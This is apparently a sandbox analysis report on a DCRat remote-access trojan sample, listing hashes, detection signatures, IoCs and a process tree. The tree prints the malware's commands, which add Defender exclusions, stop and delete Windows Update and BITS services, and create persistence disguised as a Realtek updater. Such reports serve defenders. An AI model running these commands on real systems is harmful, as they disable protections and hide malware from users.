dcrat | 442e9da5b83a8273d33a95a6cdbe4d6fc9c38fd95f87a007025d959891e7346a

Analysis

max time kernel
142s
max time network
140s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
22/03/2023, 01:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7afbf498fc56475c7960c67595374fc5d84235b381ac1193bd4ebefa3ed0e033.exe
Size

10.0MB
MD5

718c1a4f0cdacf94d4d6ad97e06a459f
SHA1

f7ea9a4f39e415c15ef563ecd4f381013e52d3a7
SHA256

7afbf498fc56475c7960c67595374fc5d84235b381ac1193bd4ebefa3ed0e033
SHA512

8a3d55db0a4eae644922895e140269f22f8214af875bf3544255bcc1be6b1de9a1274b1dd41cc4ac5826a9ac5e1d8d216994891dc124c01ba722db214652f80e
SSDEEP

196608:2JJ8G/X6v9189c+HzrMyU59NSOWQqA00aWOj/AoDvVq:2JJTCv8cEnMrrNSOhLPOj/Pv

Score

10^/10

dcrat evasion infostealer rat spyware stealer

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Process spawned unexpected child process 48 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2028	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1672	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	764	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2008	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2004	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	272	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1596	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	928	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1028	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1740	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	296	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	696	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1812	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1928	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1900	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2036	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1520	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	556	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1620	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	432	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1452	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	940	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1592	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1432	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1220	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1148	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	760	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1580	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2004	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1884	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	468	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1436	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1848	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2028	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1028	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1568	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1600	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1928	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1620	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2076	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2100	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2120	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2152	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2172	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2196	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2232	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2252	828	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2276	828	schtasks.exe	31

DCRat payload 13 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/memory/1852-54-0x0000000000400000-0x00000000015D9000-memory.dmp	dcrat
behavioral1/files/0x000600000000b533-57.dat	dcrat
behavioral1/files/0x000600000000b533-64.dat	dcrat
behavioral1/files/0x000600000000b533-65.dat	dcrat
behavioral1/files/0x000600000000b533-61.dat	dcrat
behavioral1/files/0x000600000000b533-58.dat	dcrat
behavioral1/memory/1852-75-0x0000000000400000-0x00000000015D9000-memory.dmp	dcrat
behavioral1/memory/1852-77-0x0000000000400000-0x00000000015D9000-memory.dmp	dcrat
behavioral1/memory/1300-82-0x0000000000390000-0x000000000053E000-memory.dmp	dcrat
behavioral1/memory/1300-84-0x000000001AFC0000-0x000000001B040000-memory.dmp	dcrat
behavioral1/files/0x0006000000015c5a-146.dat	dcrat
behavioral1/files/0x0006000000015c5a-147.dat	dcrat
behavioral1/memory/2468-148-0x0000000001310000-0x00000000014BE000-memory.dmp	dcrat

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 5 IoCs

pid	Process
1300	bl_fontreviewmonitordllrefsvc.exe
1532	conhost_8.exe
1800	MASTER 8BP.exe
2468	sppsvc.exe
284	Updater.exe

Loads dropped DLL 9 IoCs

pid	Process
1852	7afbf498fc56475c7960c67595374fc5d84235b381ac1193bd4ebefa3ed0e033.exe
1852	7afbf498fc56475c7960c67595374fc5d84235b381ac1193bd4ebefa3ed0e033.exe
1852	7afbf498fc56475c7960c67595374fc5d84235b381ac1193bd4ebefa3ed0e033.exe
1852	7afbf498fc56475c7960c67595374fc5d84235b381ac1193bd4ebefa3ed0e033.exe
1484	WerFault.exe
1484	WerFault.exe
1484	WerFault.exe
1484	WerFault.exe
3064	taskeng.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
1852	7afbf498fc56475c7960c67595374fc5d84235b381ac1193bd4ebefa3ed0e033.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 284 set thread context of 2840	284	Updater.exe	140

Drops file in Program Files directory 7 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\csrss.exe	bl_fontreviewmonitordllrefsvc.exe
File created	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\886983d96e3d3e	bl_fontreviewmonitordllrefsvc.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\lsm.exe	bl_fontreviewmonitordllrefsvc.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\101b941d020240	bl_fontreviewmonitordllrefsvc.exe
File created	C:\Program Files\Realtek\Realtek High Definition Audio\Updater.exe	conhost_8.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Drops file in Windows directory 8 IoCs

description	ioc	Process
File created	C:\Windows\PCHEALTH\ERRORREP\QHEADLES\dwm.exe	bl_fontreviewmonitordllrefsvc.exe
File created	C:\Windows\PCHEALTH\ERRORREP\QHEADLES\6cb0b6c459d5d3	bl_fontreviewmonitordllrefsvc.exe
File created	C:\Windows\system\lsm.exe	bl_fontreviewmonitordllrefsvc.exe
File created	C:\Windows\system\101b941d020240	bl_fontreviewmonitordllrefsvc.exe
File created	C:\Windows\Logs\lsm.exe	bl_fontreviewmonitordllrefsvc.exe
File created	C:\Windows\Logs\101b941d020240	bl_fontreviewmonitordllrefsvc.exe
File created	C:\Windows\ServiceProfiles\LocalService\sppsvc.exe	bl_fontreviewmonitordllrefsvc.exe
File created	C:\Windows\ServiceProfiles\LocalService\0a1fd5f707cd16	bl_fontreviewmonitordllrefsvc.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2724	sc.exe
2808	sc.exe
2860	sc.exe
1436	sc.exe
1740	sc.exe
2460	sc.exe
2772	sc.exe
2836	sc.exe
1300	sc.exe
2452	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
1484	1800	WerFault.exe	29
2712	2468	WerFault.exe	85

Creates scheduled task(s) 1 TTPs 50 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1620	schtasks.exe
1220	schtasks.exe
1436	schtasks.exe
1028	schtasks.exe
1620	schtasks.exe
2076	schtasks.exe
1600	schtasks.exe
2252	schtasks.exe
2028	schtasks.exe
764	schtasks.exe
2008	schtasks.exe
556	schtasks.exe
1148	schtasks.exe
1848	schtasks.exe
2276	schtasks.exe
1028	schtasks.exe
696	schtasks.exe
1580	schtasks.exe
468	schtasks.exe
2172	schtasks.exe
2232	schtasks.exe
1592	schtasks.exe
2004	schtasks.exe
1672	schtasks.exe
272	schtasks.exe
1596	schtasks.exe
928	schtasks.exe
432	schtasks.exe
1452	schtasks.exe
1884	schtasks.exe
1928	schtasks.exe
1900	schtasks.exe
2036	schtasks.exe
2028	schtasks.exe
1928	schtasks.exe
2120	schtasks.exe
1740	schtasks.exe
760	schtasks.exe
2100	schtasks.exe
296	schtasks.exe
1812	schtasks.exe
1520	schtasks.exe
940	schtasks.exe
2120	schtasks.exe
2004	schtasks.exe
1432	schtasks.exe
1568	schtasks.exe
2152	schtasks.exe
2196	schtasks.exe
2924	schtasks.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 6030a29d665cd901	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2468	sppsvc.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1300	bl_fontreviewmonitordllrefsvc.exe
1300	bl_fontreviewmonitordllrefsvc.exe
1300	bl_fontreviewmonitordllrefsvc.exe
1300	bl_fontreviewmonitordllrefsvc.exe
1300	bl_fontreviewmonitordllrefsvc.exe
2296	powershell.exe
2480	powershell.exe
2680	powershell.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2968	powershell.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
1116	powershell.exe
2468	sppsvc.exe
2468	sppsvc.exe
2400	powershell.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe
2468	sppsvc.exe

Suspicious use of AdjustPrivilegeToken 43 IoCs

description	pid	Process
Token: SeDebugPrivilege	1300	bl_fontreviewmonitordllrefsvc.exe
Token: SeDebugPrivilege	2296	powershell.exe
Token: SeDebugPrivilege	2480	powershell.exe
Token: SeDebugPrivilege	2468	sppsvc.exe
Token: SeShutdownPrivilege	2740	powercfg.exe
Token: SeShutdownPrivilege	2800	powercfg.exe
Token: SeDebugPrivilege	2680	powershell.exe
Token: SeShutdownPrivilege	2828	powercfg.exe
Token: SeShutdownPrivilege	2844	powercfg.exe
Token: SeDebugPrivilege	2968	powershell.exe
Token: SeDebugPrivilege	1116	powershell.exe
Token: SeShutdownPrivilege	980	powercfg.exe
Token: SeDebugPrivilege	2400	powershell.exe
Token: SeShutdownPrivilege	1620	powercfg.exe
Token: SeShutdownPrivilege	1396	powercfg.exe
Token: SeShutdownPrivilege	2320	powercfg.exe
Token: SeBackupPrivilege	2256	vssvc.exe
Token: SeRestorePrivilege	2256	vssvc.exe
Token: SeAuditPrivilege	2256	vssvc.exe
Token: SeAssignPrimaryTokenPrivilege	480	WMIC.exe
Token: SeIncreaseQuotaPrivilege	480	WMIC.exe
Token: SeSecurityPrivilege	480	WMIC.exe
Token: SeTakeOwnershipPrivilege	480	WMIC.exe
Token: SeLoadDriverPrivilege	480	WMIC.exe
Token: SeSystemtimePrivilege	480	WMIC.exe
Token: SeBackupPrivilege	480	WMIC.exe
Token: SeRestorePrivilege	480	WMIC.exe
Token: SeShutdownPrivilege	480	WMIC.exe
Token: SeSystemEnvironmentPrivilege	480	WMIC.exe
Token: SeUndockPrivilege	480	WMIC.exe
Token: SeManageVolumePrivilege	480	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	480	WMIC.exe
Token: SeIncreaseQuotaPrivilege	480	WMIC.exe
Token: SeSecurityPrivilege	480	WMIC.exe
Token: SeTakeOwnershipPrivilege	480	WMIC.exe
Token: SeLoadDriverPrivilege	480	WMIC.exe
Token: SeSystemtimePrivilege	480	WMIC.exe
Token: SeBackupPrivilege	480	WMIC.exe
Token: SeRestorePrivilege	480	WMIC.exe
Token: SeShutdownPrivilege	480	WMIC.exe
Token: SeSystemEnvironmentPrivilege	480	WMIC.exe
Token: SeUndockPrivilege	480	WMIC.exe
Token: SeManageVolumePrivilege	480	WMIC.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1852	7afbf498fc56475c7960c67595374fc5d84235b381ac1193bd4ebefa3ed0e033.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1852 wrote to memory of 1300	1852	7afbf498fc56475c7960c67595374fc5d84235b381ac1193bd4ebefa3ed0e033.exe	27
PID 1852 wrote to memory of 1300	1852	7afbf498fc56475c7960c67595374fc5d84235b381ac1193bd4ebefa3ed0e033.exe	27
PID 1852 wrote to memory of 1300	1852	7afbf498fc56475c7960c67595374fc5d84235b381ac1193bd4ebefa3ed0e033.exe	27
PID 1852 wrote to memory of 1300	1852	7afbf498fc56475c7960c67595374fc5d84235b381ac1193bd4ebefa3ed0e033.exe	27
PID 1852 wrote to memory of 1532	1852	7afbf498fc56475c7960c67595374fc5d84235b381ac1193bd4ebefa3ed0e033.exe	28
PID 1852 wrote to memory of 1532	1852	7afbf498fc56475c7960c67595374fc5d84235b381ac1193bd4ebefa3ed0e033.exe	28
PID 1852 wrote to memory of 1532	1852	7afbf498fc56475c7960c67595374fc5d84235b381ac1193bd4ebefa3ed0e033.exe	28
PID 1852 wrote to memory of 1532	1852	7afbf498fc56475c7960c67595374fc5d84235b381ac1193bd4ebefa3ed0e033.exe	28
PID 1852 wrote to memory of 1800	1852	7afbf498fc56475c7960c67595374fc5d84235b381ac1193bd4ebefa3ed0e033.exe	29
PID 1852 wrote to memory of 1800	1852	7afbf498fc56475c7960c67595374fc5d84235b381ac1193bd4ebefa3ed0e033.exe	29
PID 1852 wrote to memory of 1800	1852	7afbf498fc56475c7960c67595374fc5d84235b381ac1193bd4ebefa3ed0e033.exe	29
PID 1852 wrote to memory of 1800	1852	7afbf498fc56475c7960c67595374fc5d84235b381ac1193bd4ebefa3ed0e033.exe	29
PID 1800 wrote to memory of 1484	1800	MASTER 8BP.exe	30
PID 1800 wrote to memory of 1484	1800	MASTER 8BP.exe	30
PID 1800 wrote to memory of 1484	1800	MASTER 8BP.exe	30
PID 1800 wrote to memory of 1484	1800	MASTER 8BP.exe	30
PID 1300 wrote to memory of 2296	1300	bl_fontreviewmonitordllrefsvc.exe	80
PID 1300 wrote to memory of 2296	1300	bl_fontreviewmonitordllrefsvc.exe	80
PID 1300 wrote to memory of 2296	1300	bl_fontreviewmonitordllrefsvc.exe	80
PID 1300 wrote to memory of 2344	1300	bl_fontreviewmonitordllrefsvc.exe	82
PID 1300 wrote to memory of 2344	1300	bl_fontreviewmonitordllrefsvc.exe	82
PID 1300 wrote to memory of 2344	1300	bl_fontreviewmonitordllrefsvc.exe	82
PID 2344 wrote to memory of 2412	2344	cmd.exe	84
PID 2344 wrote to memory of 2412	2344	cmd.exe	84
PID 2344 wrote to memory of 2412	2344	cmd.exe	84
PID 2344 wrote to memory of 2468	2344	cmd.exe	85
PID 2344 wrote to memory of 2468	2344	cmd.exe	85
PID 2344 wrote to memory of 2468	2344	cmd.exe	85
PID 2344 wrote to memory of 2468	2344	cmd.exe	85
PID 2344 wrote to memory of 2468	2344	cmd.exe	85
PID 1532 wrote to memory of 2480	1532	conhost_8.exe	86
PID 1532 wrote to memory of 2480	1532	conhost_8.exe	86
PID 1532 wrote to memory of 2480	1532	conhost_8.exe	86
PID 1532 wrote to memory of 2660	1532	conhost_8.exe	88
PID 1532 wrote to memory of 2660	1532	conhost_8.exe	88
PID 1532 wrote to memory of 2660	1532	conhost_8.exe	88
PID 1532 wrote to memory of 2672	1532	conhost_8.exe	89
PID 1532 wrote to memory of 2672	1532	conhost_8.exe	89
PID 1532 wrote to memory of 2672	1532	conhost_8.exe	89
PID 1532 wrote to memory of 2680	1532	conhost_8.exe	91
PID 1532 wrote to memory of 2680	1532	conhost_8.exe	91
PID 1532 wrote to memory of 2680	1532	conhost_8.exe	91
PID 2660 wrote to memory of 2724	2660	cmd.exe	94
PID 2660 wrote to memory of 2724	2660	cmd.exe	94
PID 2660 wrote to memory of 2724	2660	cmd.exe	94
PID 2672 wrote to memory of 2740	2672	cmd.exe	95
PID 2672 wrote to memory of 2740	2672	cmd.exe	95
PID 2672 wrote to memory of 2740	2672	cmd.exe	95
PID 2660 wrote to memory of 2772	2660	cmd.exe	96
PID 2660 wrote to memory of 2772	2660	cmd.exe	96
PID 2660 wrote to memory of 2772	2660	cmd.exe	96
PID 2672 wrote to memory of 2800	2672	cmd.exe	98
PID 2672 wrote to memory of 2800	2672	cmd.exe	98
PID 2672 wrote to memory of 2800	2672	cmd.exe	98
PID 2660 wrote to memory of 2808	2660	cmd.exe	97
PID 2660 wrote to memory of 2808	2660	cmd.exe	97
PID 2660 wrote to memory of 2808	2660	cmd.exe	97
PID 2672 wrote to memory of 2828	2672	cmd.exe	99
PID 2672 wrote to memory of 2828	2672	cmd.exe	99
PID 2672 wrote to memory of 2828	2672	cmd.exe	99
PID 2660 wrote to memory of 2836	2660	cmd.exe	100
PID 2660 wrote to memory of 2836	2660	cmd.exe	100
PID 2660 wrote to memory of 2836	2660	cmd.exe	100
PID 2672 wrote to memory of 2844	2672	cmd.exe	101

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\7afbf498fc56475c7960c67595374fc5d84235b381ac1193bd4ebefa3ed0e033.exe
"C:\Users\Admin\AppData\Local\Temp\7afbf498fc56475c7960c67595374fc5d84235b381ac1193bd4ebefa3ed0e033.exe"
1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1852
- C:\Users\Admin\AppData\Roaming\bl_fontreviewmonitordllrefsvc.exe
  "C:\Users\Admin\AppData\Roaming\bl_fontreviewmonitordllrefsvc.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1300
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2296
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\GWoDDBK4PE.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2344
  - - C:\Windows\system32\w32tm.exe
      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
      4⤵
      PID:2412
  - - C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\sppsvc.exe
      "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\sppsvc.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2468
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2468 -s 1056
        5⤵
        Program crash
        
        PID:2712
- C:\Users\Admin\AppData\Roaming\conhost_8.exe
  "C:\Users\Admin\AppData\Roaming\conhost_8.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory
  PID:1532
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2480
- - C:\Windows\system32\cmd.exe
    cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2660
  - - C:\Windows\system32\sc.exe
      sc stop UsoSvc
      4⤵
      Launches sc.exe
      PID:2724
  - - C:\Windows\system32\sc.exe
      sc stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:2772
  - - C:\Windows\system32\sc.exe
      sc stop wuauserv
      4⤵
      Launches sc.exe
      PID:2808
  - - C:\Windows\system32\sc.exe
      sc stop bits
      4⤵
      Launches sc.exe
      PID:2836
  - - C:\Windows\system32\sc.exe
      sc stop dosvc
      4⤵
      Launches sc.exe
      PID:2860
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
      4⤵
      PID:2872
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
      4⤵
      PID:2884
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
      4⤵
      Modifies security service
      PID:2892
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
      4⤵
      PID:2904
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      4⤵
      PID:2912
- - C:\Windows\system32\cmd.exe
    cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2672
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -hibernate-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2740
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -hibernate-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2800
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -standby-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2828
  - - C:\Windows\system32\powercfg.exe
      powercfg /x -standby-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2844
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell <#svswkfzf#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Realtek' /tr '''C:\Program Files\Realtek\Realtek High Definition Audio\Updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Realtek\Realtek High Definition Audio\Updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Realtek' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Realtek" /t REG_SZ /f /d 'C:\Program Files\Realtek\Realtek High Definition Audio\Updater.exe' }
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2680
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn Realtek /tr "'C:\Program Files\Realtek\Realtek High Definition Audio\Updater.exe'"
      4⤵
      Creates scheduled task(s)
      PID:2924
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
